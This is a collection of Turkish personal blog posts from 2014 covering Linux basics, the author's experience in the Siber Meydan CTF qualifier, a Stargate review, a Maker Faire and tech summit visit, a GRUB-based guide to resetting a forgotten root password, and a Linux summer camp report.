Temel Linux Kullanımı ve Komutları2014-12-24T14:03:00+00:00ahmetgurel.github.io/linux/linux%20komutlar%C4%B1/linux%20kullanimi/linux%20%C3%B6gren/temel%20linux%20komutlar%C4%B1/2014/12/24/temel-linux-kullan%c4%b1m%c4%b1-ve-komutlar%c4%b1<p>Bir önceki sunumumda GNU/Linux nedir? Linux’un tarihçesi,Linux’ta dağıtım nedir? ve Linux kurulumunu anlatmaya çalışmıştım.Bu sunuma başlamadan önce ona bakmanız faydalı olacaktır.Ona ulaşmak için <a href="http://www.gurelahmet.com/linux-a-giri%C5%9F-ve-virtualbox-ile-ubuntu-kurulumu/">tıklayınız.</a>Bu sunumda ise Temel Linux Kullanımı ve Komutlarını anlatmaya çalıştım.Her türlü soru,görüş ve önerilerinizi yorum kısmından,sol tarafta ki sosyal ağlardan bana iletebilirsiniz.Umarım faydalı olur iyi çalışmalar.</p>
<iframe width="476" height="400" src="//www.slideshare.net/slideshow/embed_code/42986843" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Siber Meydan Yarışması2014-11-26T16:57:00+00:00ahmetgurel.github.io/genel%20g%C3%BCvenlik/siber%20g%C3%BCvenlik/siber%20meydan/siber%20savunma/tubitak/%C3%BCniversiteler%20arasi%20guvenlik/2014/11/26/siber-meydan-yar%c4%b1%c5%9fmas%c4%b1<p>Siber Meydan Üniversiteler arası Siber Güvenlik Yarışmasıdır.TUBITAK BILGEM Siber Güvenlik Enstitüsü tarafından ilk olarak 2013 yılında düzenlenmiş ve o yıldan itibaren her sene düzenlenmesi kararlaştırılan yarışmadır.Amaç Siber Güvenlik konularında bilgi ve farkındalığı artırmak.Yarışma geçen yıl iki aşamadan oluşuyorda internet üzerinden ön eleme, ön elemede ilk 10 a giren takımlar finale giderek orada kendini savun rakibine saldır konsepti ile yarışıp ilk 3 takım ödüllerini alıyordu.Bu sene buna ek olarak yarı final eklenmiş durumda.Ön elemede ilk 15 e giren takımlar yarı finale çıkarak orada ilk 10 a giren takımlar finale çıkacak.Sanırım hedef finale çıkan takımların en ıyı 10 takım olmasını sağlamak.Ön eleme online olduğu için yardımlaşmanın olabileceği gerçeğini göz önüne alınmış.</p>
<p><strong>Siber Meydan 2014</strong></p>
<p><strong>Ön Eleme (internet üzerinden):</strong> 20-21 Kasım 2014
<strong>Yarı Final (Çevirimdışı):</strong> 14 Aralık 2014
<strong>Final (Çevirimdışı):</strong> 15 Aralık 2014</p>
<p><strong>Şimdi gelelim Siber Meydan 2014 Ön Elemesine(1.Aşama) </strong></p>
<p>Bu yıl FreeFiles adlı takım ile bende Siber Meydan a katıldım.Sınav haftamdan dolayı geçte olsa bu yazıda size ön elemenin nasıl geçtiğini anlatmak istedim.Ön elemede kendi içinde 2 seviyeden oluşmakta.Aslında üç seviye Seviye0,Seviye1,Seviye2 ama Seviye0 da bir şey yapmıyoruz.Onun için iki seviye var ilk seviyede bir tane rar veriliyor içinde sorulan sorularla ilgili çeşitli dosyalar bulunmakta bunları analiz ederek istenileni bularak puan topluyoruz.Takım 1000 puana ulaştığı zaman seviye 2 kendiliğinden açılıyor.Yada 20 kasım saat 21.00 ı bekleyerek tüm takımlara seviye 2 nin açılışını görebilirdiniz.Yarışmanın sayfasından aldığım ekran görüntülerinde daha fazla ayrıntıyı görebilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/sevıye0.jpg"><img class="alignnone size-large wp-image-304" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/sevıye0-1024x622.jpg" alt="sevıye0" width="976" height="592" /></a></p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/sevıye1.jpg"><img class="alignnone size-full wp-image-305" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/sevıye1.jpg" alt="sevıye1" width="901" height="605" /></a></p>
<p> </p>
<p>Soruların cevaplarını girerken MD5 olarak girmenizi istiyor.Yanlıs girilen cevapları saatleriyle birlikte görebilirsiniz.Seviye 2 de aynı şekilde işlemektedir.Bunun dışında çok güçlü takımların yarıştığı her anın heyecanlı geçtiği bir ön eleme oldu hele ki son dakikalar mükemmeldi :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/0.png"><img class="alignnone size-full wp-image-306" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/0.png" alt="0" width="874" height="650" /></a></p>
<p> </p>
<p> </p>
<p>Sisteme ilk girmeninde faydaları oluyor tabi örneğin birincilikte kendi takımınızın ekran görüntüsünü alabiliyorsunuz :D Durum böyle iken bile yarışma güçlü takımların olduğu zor kaliteli soruların bulunduğu güzel bir ctf oldu.Sürekli değişen sıralamalar takımların kıyasıya yarışı.Benim için en zor kısmı vize haftama denk gelmiş olması ve 20 Kasım Saat 9.00 da başlayıp 21 Kasım 21.00 da bıten 36 saatlik uykusuz geçen zamandı sanırım :) Yarışma esnasında sık sık aldığım ekran görüntülerini yarışmanın nasıl geçtiğini görebilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/11.png"><img class="alignnone size-large wp-image-307" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/11.png" alt="1" width="920" height="674" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/2.jpg"><img class="alignnone size-large wp-image-308" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/2-1024x607.jpg" alt="2" width="976" height="578" /></a></p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/4.jpg"><img class="alignnone size-large wp-image-309" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/4.jpg" alt="4" width="942" height="629" /></a></p>
<p> </p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/6.png"><img class="alignnone size-large wp-image-311" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/6-1024x646.png" alt="6" width="976" height="615" /></a></p>
<p> </p>
<p>Böyle değişen bir sıralama tablosu vardı son dakikalarda ilk 15 e giren takımlar son dakikada ilk 15 den düşen takımlar hatta 1.lik için kıyasıya yarışan Octosec,TurkSec,PermissionDenied takımlarıyla yarışma daha zevkli hala geldi.Yarışmayı 11 yada 10.sayılırız üstte kı takımla aynı paundayız :D Ilk 15 e girerek 14 Aralıkta yarı finale çıkmaya hak kazandık :)</p>
<p><a href="http://www.sibermeydan.org/">Siber Meydan Hakkında Daha Fazla Bilgi için Tıklayınız.</a></p>
<p>Siber Meydan Ön Eleme Sorularını paylaşıyor en kısa zamanda 2014 ude paylasacaklardır.Şimdilik 2013 un sorularına <a href="http://sorucevap.sibermeydan.org">http://sorucevap.sibermeydan.org</a> adresinden ulaşabilirsiniz.</p>
<p> </p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Stargate Efsanesi2014-11-19T15:00:00+00:00ahmetgurel.github.io/dizi/dizi%20ve%20sinema%20d%C3%BCnyasi/stargate/stargate%20atlantis/stargate%20dizisi/stargate%20efsanesi/stargate%20sg-1/stargate%20universe/2014/11/19/stargate-efsanesi<p>Merhaba arkadaşlar,blogumu açarken sadece teknik olmasın hep yazılım,kod olmamalı dedim.Başımdan geçen güzel,değişik,beni etkileyen olayları Hayattan Gelenler kategorisinde,boş zamanlarımda çok fazla dizi ve film izlediğim içinde Dizi ve Sinema Dünyası kategorisini oluşturdum.Fakat blog acalı bır seneyı geçti önce blogspot ile başladım daha sonra gurelahmet.com a taşıdım ama daha hiç bir film yada dizi hakkında bir şey yazmadığımı görünce üzüldüm.Ne kadar sadece teknik olmasın sosyal şeyler,günlük tarzında olsun istesemde bazen yazmaya üşenmekten bazende vakit bulamamaktan dolayı böyle olmuş.Öyle yada böyle bu kategorinin ilk yazısına başlamış oldum sonuçta :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/StarGate-Continuum-science-fiction-4387465-1280-800.jpg"><img class="alignnone size-large wp-image-295" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/StarGate-Continuum-science-fiction-4387465-1280-800-1024x640.jpg" alt="stargate" width="976" height="610" /></a></p>
<p><strong>Stargate Serisi Daha Doğrusu Efsanesi</strong></p>
<p>Öncedende söylemişimdir ama tam bir sinema ve dizi tutkunuyumdur.2 yıla kadar arşiv hastalığım vardı yaklaşık 1.5 tb film ve dizi arşivim bulunmakta.2 sene öncesine aitler 2 yıldır online izlemekteyim :) Izlediğim bir çok dizinin içinden Stargate ile başlamak istedim.Çünkü dizi izleyen birsi günümüzün popüler dizilerini izlemesede konusunu oyuncularını biliyordur.(Örn:Game of Thrones,Breaking Bad gibi) Bunlar biraz daha yeni diziler olduğundan dolayı ama Stargate(Yıldız Geçidi) 1997 yılında Stargate SG-1 adıyla başlayıp 10 Sezon oynarken SG-1 bitmeden Stargate Atlantis başlayıp 5 Sezonda o oynamıştır.SG-1 serisinin devami niteliğindedir Atlantis.SG-1 den sonra iki tane sinema filmi çekilmiştir.<i><b>Stargate: The Ark of Truth ve <b>Stargate: Continuum </b></b></i><b></b> ve son olarak SG-1 ve Atlantisten sonra Stargate Universe olarak 2 sezonluk bir devam dizisi takip etmektedir.Yani 1997 de başlayıp toplamda 17 sezon ve 2 sinema filmi ile devam eden bir Bilim Kurgu efsanesi karşınızda durmaktadir.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/1574528.jpg"><img class="alignnone size-large wp-image-296" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/1574528-1024x640.jpg" alt="stargate" width="976" height="610" /></a></p>
<p><strong style="font-size: 15px;"><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/Sg_universe1.png"><img class="alignnone size-large wp-image-297" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/Sg_universe1-1024x640.png" alt="Sg_universe1" width="976" height="610" /></a>Stargate Efsanesi ne anlatıyor ?</strong></p>
<p>1994 da Stargate adlı filmin devami şeklinde 1997 den 2009 a kadar toplam 17 sezonluk üç dizi ve 2 sinema filmi ile devam eden bu seri ana olayı Stargate(Yıldız Geçiti) ni kullanarak yeni gezegenlere gidip yeni teknolojiler bulup yeni ırklarla tanışmaktır.Bu süre zarfında evrende ki farklı düşmanlarla uğraşmışlardır.Yıldız Geçitlerini yapan zeki ırk ile bağlantıları olmuştur ilk sezonlarda biraz sıkılsanızda daha sonradan teknolojik olarak gelişen düşmanlarıyla savaşmakta daha başarılı bir hala gelecektir.O zamandan sonra bırakamayacaksınız zaten :).Bilim kurgu seviyorsanız uzayı merak edip düşünüyorsanız başlamanız gereken tek dizi budur diyorum.Ve en uzun bilim kurgu dizisi ünvanı vardır tüm serileri izlemiş bir Stargate seveni olarak yeni bir devam dizisi beklemekteyim :)</p>
<p>Izlerken SG-1 den sonra Atlantis ve daha sonra Iki sinema filmini izleyip son olarak Stargate Universe izlerseniz herşey daha bağlantılı gelecektir :)</p>
<p><strong>Bakınız:</strong></p>
<p>1-<a href="http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_SG-1">http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_SG-1</a></p>
<p>2-<a href="http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_Atlantis">http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_Atlantis</a></p>
<p>3-<a href="http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_Evren">http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi_Evren</a></p>
<p>4-<a href="http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi:_Ger%C3%A7e%C4%9Fin_Sand%C4%B1%C4%9F%C4%B1">http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi</a></p>
<p>5-<a href="http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi:_S%C3%BCreklilik">http://tr.wikipedia.org/wiki/Y%C4%B1ld%C4%B1z_Ge%C3%A7idi:_S%C3%BCreklilik</a></p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Istanbul Maker Faire & Turkcell Teknoloji Zirvesi 142014-11-17T15:51:00+00:00ahmetgurel.github.io/hayattan%20gelenler/istanbul%20maker%20faire/maker/maker%20faire/teknoloji/turkcell/turkcell%20teknoloji%20zirvesi/2014/11/17/istanbul-maker-faire-turkcell-teknoloji-zirvesi-14<p>Merhaba bu yazımda Süleyman Demirel Üniversitesi Yazılım Kulubü ile beraber gittiğimiz Haliç Kongre Merkezindeki Maker Faire ve Turkcell Teknoloji Zirvesine değineceğim.Öncelikle Maker Faire Ile başlayalım.</p>
<p> </p>
<p><strong>Maker Faire Nedir?</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/000.jpg"><img class="alignnone size-full wp-image-261" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/000.jpg" alt="maker faire istanbul" width="960" height="720" /></a></p>
<p>Maker hareketi gelişen teknoloji ile beraber insanların ürettikleri projeleri sergiledikleri maker panayırlarıdır.Dünyanın dört bır yanında makerspace ya da hackerspace adıyla kurulan atölyelerde makerlar beraberce yeni şeyler üretiyor.Türkiyede hatta Istanbulda sayısı şuan oldukça az olan fakat farkındalık ile yakında bir çok ilde olup çok daha büyük bir maker panayırının kuralacağına eminim :)</p>
<p><a href="http://www.sduyazilim.net/">SDÜ YAZILIM KULÜBÜ</a> olarak <a href="https://gelecegiyazanlar.turkcell.com.tr/etkinlik/devwomen-isparta-2014">DevWomen </a> etkinliğimizde <a href="https://twitter.com/mdincol">Melis Dinçol </a>un bize izlettiği yurt dışındaki Maker Faire ziyaretine mutlaka bakmalısınız :)</p>
<iframe src="//www.youtube.com/embed/ZNL0lMCLHfw" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe>
<p>Yurt dışında daha çok maker ve buluşun katıldığı zaten ortada umarım önümüzde ki yıllar Türkiyede ki Maker hareketide bu boyuta ulaşır.</p>
<p><strong>Istanbul Maker Faire da Neler Vardı ?</strong></p>
<ul>
<li>Giyilebilir Teknolojiler</li>
<li>Üç Boyutlu Yazicilar</li>
<li>Ardunio ve farklı bir çok buluş vardı :)</li>
</ul>
<p>Giyilebir teknolojileri deneme ve inceleme fırsatımız oldu Google Glass, yerli üretim giyilebilir teknolojimiz Flying Fingers da oradaydı :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_143252.jpg"><img class="alignnone size-large wp-image-262" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_143252-768x1024.jpg" alt="flying fingers" width="768" height="1024" /></a></p>
<p>Üç boyutlu yazıcılarıda bolca inceleme imkanımız oldu :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_142621.jpg"><img class="alignnone size-large wp-image-263" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_142621-768x1024.jpg" alt="3 boyutlu yazıcılar" width="768" height="1024" /></a> <a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_142702.jpg"><img class="alignnone size-large wp-image-265" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/IMG_20141112_142702-1024x768.jpg" alt="üç boyutlu yazıcılar" width="976" height="732" /></a></p>
<p> </p>
<p>Sonuç olarak çok güzel bir maker panayırı oldu herkesin gelip görmesi gereken bir etkinlikti umarım önümüzdeki senelerde daha büyük daha çok maker ile gerçekleşir :) Buradan <a href="http://www.makersturkiye.com/">Makers Türkiye</a> ile daha fazla bilgi alabilirsiniz :)</p>
<p><strong>Turkcell Telnoloji Zirvesi 14 </strong></p>
<p>Her iki etkinliğinde Haliç Kongre Merkezinde olmasından dolayı merak ettiğim iki etkinliğede katılma fırsatım oldu.<a href="http://www.turkcell.com.tr/teknolojizirvesi">Turkcell Teknoloji Zirvesi </a> gerçekten özenle hazırlanmış <a href="http://www.turkcell.com.tr/">Turkcell</a> in kalitesini ve teknolojiye verdiği önemi gösteren bir etkinlik olmuş.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/kapısı.jpg"><img class="alignnone size-full wp-image-271" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/kapısı.jpg" alt="turkcell teknoloji zirvesi" width="720" height="960" /></a></p>
<p> </p>
<p>[caption id=”attachment_273” align=”alignnone” width=”768”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/00000000000000.jpg"><img class="wp-image-273 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/00000000000000-768x1024.jpg" alt="turkcell" width="768" height="1024" /></a> 10 Saatlik Isparta-Istanbul Yolculuğundan Sonra Tipler :)[/caption]</p>
<p> </p>
<p>Konuşmacılar alanlarında uzman güzel isimlerdendi özellikle dünyaca ünlü Futurist <a href="http://tr.wikipedia.org/wiki/Michio_Kaku">Dr.Michio Kaku</a> dikkatimi çekmişti.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/dr.Michio-Kaku.jpg"><img class="alignnone size-full wp-image-272" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/dr.Michio-Kaku.jpg" alt="dr.Michio Kaku" width="960" height="540" /></a></p>
<p> </p>
<p>Konuşmacıların yanında Zirvede bir çok marka ve tekonolojisi yer alıyordu.Teknolojiyi seven birisi olarak gezerken çok eğlendim ve standlarda inceleme yaparken kulaklık ve flash bellek gibi küçük hediyeler unutulmamış :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/10799654_10203235874441795_761724130_n.jpg"><img class="alignnone size-full wp-image-274" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/10799654_10203235874441795_761724130_n.jpg" alt="turkcell" width="960" height="720" /></a></p>
<p> </p>
<p>Turkcell Teknoloji Zirvesi bütün gün teknoloji ile uğraştıktan sonra ilk akşam <a href="http://tr.wikipedia.org/wiki/Tolga_%C3%87evik">Tolga Çevik</a> ile Arkadaşım Hoş Geldin bizimleydi :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/arkadaşım-hoşgeldin.jpg"><img class="alignnone size-full wp-image-275" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/arkadaşım-hoşgeldin.jpg" alt="arkadaşım hoşgeldin" width="466" height="350" /></a></p>
<p> </p>
<p>Bu güzel Teknolojinin kapanışıda <a href="http://tr.wikipedia.org/wiki/Sezen_Aksu">Sezen Aksu</a> ile oldu :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/11/kapanış.jpg"><img class="alignnone size-full wp-image-276" src="http://www.gurelahmet.com/wp-content/uploads/2014/11/kapanış.jpg" alt="turkcell sezen aksu" width="960" height="720" /></a></p>
<p> </p>
<p>Turkcell Istanbul Maker Faire etkinliğininde ana sponsoruydu hem onun için hemde bu güzel Teknoloji Zirvesi için teşekkürler Turkcell :)</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux'ta Unutulan Root Şifresi Değiştirme2014-10-11T17:03:00+00:00ahmetgurel.github.io/linux/linux%20root%20%C5%9Fifresi/linux%20root%20%C5%9Fifresi%20de%C4%9Fi%C5%9Ftirme/root/unutulan%20root%20%C5%9Fifresi/2014/10/11/linuxta-unutulan-root-%c5%9fifresi-de%c4%9fi%c5%9ftirme<p>Linux ta bildiğiniz gibi bazı işlemleri gerçekleştirebilmeniz için root yetkilerine sahip olmanız gerekir.Program yükleyip kaldıracağınız zaman,sistem dosyalarında değişiklik yapacağınız zaman root yetkisi gerekir fakat bazen root şifresi unutulabiliyor hele ki yeni kullanıcıların çok başına gelmektedir.Bu yazımda Debian(Ubuntu,Mint,Kali,Pardus…) dağıtımlarında unutulan root şifresini yeniden oluşturmayı anlatacağım.Önümüze gelen grub ekranı aşağıda ki görselde mevcut grub ekranında E tuşuna basarak EDIT hala getireceğiz.</p>
<p>[caption id=”attachment_236” align=”alignnone” width=”584”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/0.png"><img class="size-full wp-image-236" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/0.png" alt="Grub Ekranı" width="584" height="414" /></a> Grub Ekranı[/caption]</p>
<p>[caption id=”attachment_237” align=”alignnone” width=”623”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/11.jpg"><img class="size-full wp-image-237" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/11.jpg" alt="Grub Ekranında E ye Bastıktan Sonra" width="623" height="448" /></a> Grub Ekranında E ye Bastıktan Sonra Edit Hali[/caption]</p>
<p>Şimdi yukarıda ki görselde kırmızı ile çizilmiş kısımlar bizim için önemli ro yazan yerde ki yolu değiştirdikten sonra Ctrl-x yada F10 ile boot ederek sistemi root olarak açacağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/3.jpg"><img class="alignnone size-full wp-image-238" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/3.jpg" alt="linux grub" width="691" height="520" /></a></p>
<p>ro ve sonrasını silerek rw quiet init=/bin/bash yazarak CTRL+X yada F10 ile boot edeceğiz.Bu arada ro ve rw kernel parametreleridir.ro default olarak gelen sadece okuma iznini barındırıyor rw ise okumanın yanında yazma yetkisinide barındırıyor.ro yu kullansak yazma yetkımızın olmamasından dolayı bir hata alabilirdik.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/41.png"><img class="alignnone size-full wp-image-239" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/41.png" alt="linux grub" width="806" height="495" /></a></p>
<p>Boot ettikten sonra sistem root olarak açılıyor. passwd komutunu girerek yeni şifre belirleyeceğiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/61.png"><img class="alignnone size-full wp-image-242" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/61.png" alt="6" width="861" height="572" /></a></p>
<p>Resimdeki gibi komutu girdikten sonra yeni şifre oluşturmamızı isteyecek ve bunu tekrar girmemizi isteyecek.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/71.png"><img class="alignnone size-full wp-image-243" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/71.png" alt="7" width="847" height="563" /></a></p>
<p>Resimde gördüğünüz gibi işlem başarı ile gerçekleşti passwd: password updated successfully gibi bir çıktı aldık.Artık şifreniz yeniden oluşturulmuştur güle güle kullanınız :) Başka bir yazıda görüşmek üzere :)</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux Yaz Kampı 2014 ün Ardından...2014-10-06T19:48:00+00:00ahmetgurel.github.io/bolu/linux/linux%20yaz%20kampi/2014/10/06/linux-yaz-kamp%c4%b1-2014-%c3%bcn-ard%c4%b1ndan<p>Bu yaz Linux Yaz Kampına katıldım.Bununla ilgili olarak ne zamandır bir yazı yazmak istiyordum fakat vakit bulamamıştım.Bayram bunun için bir fırsat oldu :) Linux Yaz Kampı 11 – 23 Ağustos tarihleri arasında Bolu Abant Izzet Baysal Üniversitesinde düzenlendi.2010 yılından beridir düzenlenen kamp bu seneyle beraber 3.defa Boluda yapılmıştır.Bolu ile özdeşleşmiş resmen o tarihlerde öğrenci topluluğunu gören Bolulular kampa geldiğimizi anlıyorlar :) Bolu Ankara ve Istanbul un tam ortasında olup ulaşımından dolayı gayet iyi bir seçim.</p>
<ul>
<li>Linux Yaz Kampı 2014 / Bolu Abant İzzet Baysal Üniversitesi</li>
<li>Linux Yaz Kampı 2013 / Bolu Abant İzzet Baysal Üniversitesi</li>
<li>Linux Yaz Kampı 2012 / Bolu Abant İzzet Baysal Üniversitesi</li>
<li>Linux Yaz Kampı 2011 / Düzce Üniversitesi</li>
<li>Linux Yaz Kampı 2010 / Işık Üniversitesi Şile Yerleşkesi</li>
</ul>
<p>Linux Yaz Kampı tamamen ücretsiz olup,15 gun boyunca sabah 9 aksam 9 12 saat eğitimiyle özel eğitim kurumları yada üniversitelerde alamayacağımız bir eğitim.Fakat binlerce başvuru arasından sınırlı öğrenci alımı oluyor ellerinden geldiğince her sene yenı sınıflar kontenjanlar açıyorlar ve gelen eğitmenler gerçekten işlerini seven eğitimi,özgür yazılımı,paylaşmayı benimsemiş kişiler.Tatil yapmak yerine yazın ortasında 15 gun gunde 12 saat eğitim veriyorlar hiç bir karşılık almaksızın.</p>
<p>Linux Yaz Kampını LKD(Linux Kulanıcıları Derneği) ve INETD(Internet Teknolojileri Derneği) düzenlemektedir.Başvurularda bu iki derneğe üye iseniz öncelikli duruma geliyorsunuz.Bunun yanında başvuru formunda github hesabı soruluyordu yaptığınız projlerinde önemi var.Çalıştığınız uğraştığınız teknolojilerin özgür olmasınıda dikkat ederler sanırım :)</p>
<p>Linux Yaz Kampında Boluya gittikten sonra Kamp için KYK yurtlarında konaklıyoruz bu sene 100 tl ye kalmıştık.Yemek yok içinde yemeğide Kampüsün içinde ki yerlerden halledilebiliyor.Yani konaklamada yemekte aklınıza takılan bir şey olmasın vaktiniz var ve seçilmişseniz mutlaka gitmelisiniz :) Bu arada staj yaptığım <a href="https://www.intelrad.com/">INTELRAD</a> firması Yaz Kampına giden tüm stajyerlerin biletlerini,konaklama ve yemek ücretlerini karşıladı burdan CEO muz Can Yıldızlıya yeniden teşekkür ederim.Kamp sadece linux üzerine değil sistem ve ağ yönetiminin yanında programlama kursları(java,python,php,ruby) ve güvenlik(web uygulama güvenliği,tersine mühendislik) gibi bir çok kurs vardı.Kurslar hakkında ayrıntılı bilgi için <a href="http://kamp.linux.org.tr/2014/kurslar/">tıklayınız.</a>Ben bu sene Sistem ve Ağ Yönetimi 1 Kursuna gittim önümüzde ki senelerde diğer kurslarada gitmeyi düşünüyorum :)</p>
<p>[caption id=”attachment_223” align=”alignnone” width=”300”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/Makale14-3.jpg"><img class="wp-image-223 size-medium" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/Makale14-3-300x225.jpg" alt="linux yaz kampı" width="300" height="225" /></a> Linux Yaz Kampına Giderken[/caption]</p>
<p>KURS KONULARI:</p>
<ul>
<li>Komut Satırı (Kabuk) ve Temel Komutlar</li>
<li>GNU/Linux İşletim Sisteminin Yapısı</li>
<li>Açılış Sistemi ve Kullanıcı Yönetimi</li>
<li>Paket Yönetim Sistemi</li>
<li>Zamanlanmış Görevler</li>
<li>Sistem Kayıtları</li>
<li>Temel TCP/IP Bilgisi ve Ağ Yönetimi</li>
<li>Güvenli Uzaktan Erişim</li>
<li>Yedekleme</li>
<li>DNS ve Web Teknolojisine Giriş</li>
</ul>
<p>Bu konular hakkında uygulamalı olarak 108 saatlik bir eğitim aldık.Sistem ve Ağ Yönetimi 1 bu sene 3 sınıftık.Alanında uzman bir çok eğitmenle tanıştım,konuştum.Bunun dışanca bir çok üniversiteden farklı bölümden öğrencilerin bulunduğu güzel bir ortamdı.Dersler öğreticiliğinin yanında bir o kadarda eğlenceli geçti :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/lyk-doruk1cv.jpg"><img class="alignnone size-large wp-image-224" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/lyk-doruk1cv-1024x579.jpg" alt="lyk-sys-c-sınıfı" width="976" height="551" /></a></p>
<p> </p>
<p>Kurs sırasında bir gün ara verilerek Bolu Gölcük Tabiat Parkına Gezi düzenlendi gayet eğlenceli ve güzel bir gündü :)</p>
